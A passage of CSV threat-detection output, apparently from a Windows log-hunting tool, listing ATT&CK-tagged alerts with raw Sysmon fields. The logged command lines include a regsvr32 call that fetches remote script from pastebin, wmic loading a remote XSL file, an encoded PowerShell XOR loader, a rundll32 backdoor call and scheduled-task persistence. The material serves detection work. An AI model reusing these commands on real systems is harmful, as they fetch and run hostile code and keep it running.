bQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243540 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.029 + 747F3D96-9F69-5E75-0000-0010946B2000 + 1828 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 104.20.208.21 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 16794 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:04.463 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7..home + 49165 + + false + 104.20.208.21 + + 80 + http + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243540 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.029 + 747F3D96-9F69-5E75-0000-0010946B2000 + 1828 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 7648 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:13:42.278 + 365ABB72-9AA6-5D04-0000-00109C850F00 + 652 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-98E4-5D04-0000-0020A4350100 + 0x135a4 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-9972-5D04-0000-0010F0490C00 + 3660 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( cmd /c ping 127.0.0.1&&del del /F /Q /A:H "C:\Users\IEUser\AppData\Roaming\wwlib.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 417085 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 11:43:49.217 + 747F3D96-D8F5-5F8A-0000-00106B6F7300 + 1680 + C:\Windows\SysWOW64\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd /c ping 127.0.0.1&&del del /F /Q /A:H "C:\Users\IEUser\AppData\Roaming\wwlib.dll" + C:\Users\IEUser\AppData\Roaming\ + MSEDGEWIN10\IEUser + 747F3D96-CA8D-5F8A-0000-0020D1090A00 + 0xa09d1 + 1 + High + SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A + 747F3D96-D8E5-5F8A-0000-0010E1BC7200 + 2920 + C:\Users\IEUser\AppData\Roaming\WINWORD.exe + C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436008.374373,2019-07-30T01:33:28.374373+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4916 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:28.197 + 747F3D96-6628-5D3F-0000-001067768800 + 1296 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243540 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.029 + 747F3D96-9F69-5E75-0000-0010946B2000 + 1828 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 7648 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:13:42.278 + 365ABB72-9AA6-5D04-0000-00109C850F00 + 652 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-98E4-5D04-0000-0020A4350100 + 0x135a4 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-9972-5D04-0000-0010F0490C00 + 3660 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1088] Bypass User Account Control - Process,1555606626.954307,2019-04-18T20:57:06.954307+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\mmc.exe ) through command line ( "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 15 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1088,technique_name=Bypass User Account Control + 2019-04-18 16:57:04.500 + 365ABB72-AC60-5CB8-0000-001037BA0800 + 3900 + C:\Windows\System32\mmc.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft Management Console + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1 + 365ABB72-AC60-5CB8-0000-001002B30800 + 3904 + C:\Windows\System32\eventvwr.exe + "C:\Windows\system32\eventvwr.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 7648 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:13:42.278 + 365ABB72-9AA6-5D04-0000-00109C850F00 + 652 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-98E4-5D04-0000-0020A4350100 + 0x135a4 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-9972-5D04-0000-0010F0490C00 + 3660 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.121924,2019-05-27T05:29:18.121924+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5913 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.081 + 365ABB72-3D6E-5CEB-0000-00100C87FF00 + 2896 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558630145.862062,2019-05-23T20:49:05.862062+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 892 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 16:49:05.686 + 365ABB72-CF01-5CE6-0000-00105DA50C00 + 3872 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl" + c:\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-CE84-5CE6-0000-001094130600 + 2940 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16793 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.765 + 365ABB72-6759-5CD8-0000-001085031000 + 1912 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16793 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.765 + 365ABB72-6759-5CD8-0000-001085031000 + 1912 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436008.250664,2019-07-30T01:33:28.250664+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4915 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:33:24.152 + 747F3D96-6623-5D3F-0000-0010BC068800 + 3000 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49828 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 14 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-04-18 16:56:24.833 + 365ABB72-AC38-5CB8-0000-0010365E0800 + 3576 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + Powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 14 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-04-18 16:56:24.833 + 365ABB72-AC38-5CB8-0000-0010365E0800 + 3576 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + Powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6195 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + Persistence - Scheduled Task Management + 2019-05-27 15:12:59.558 + 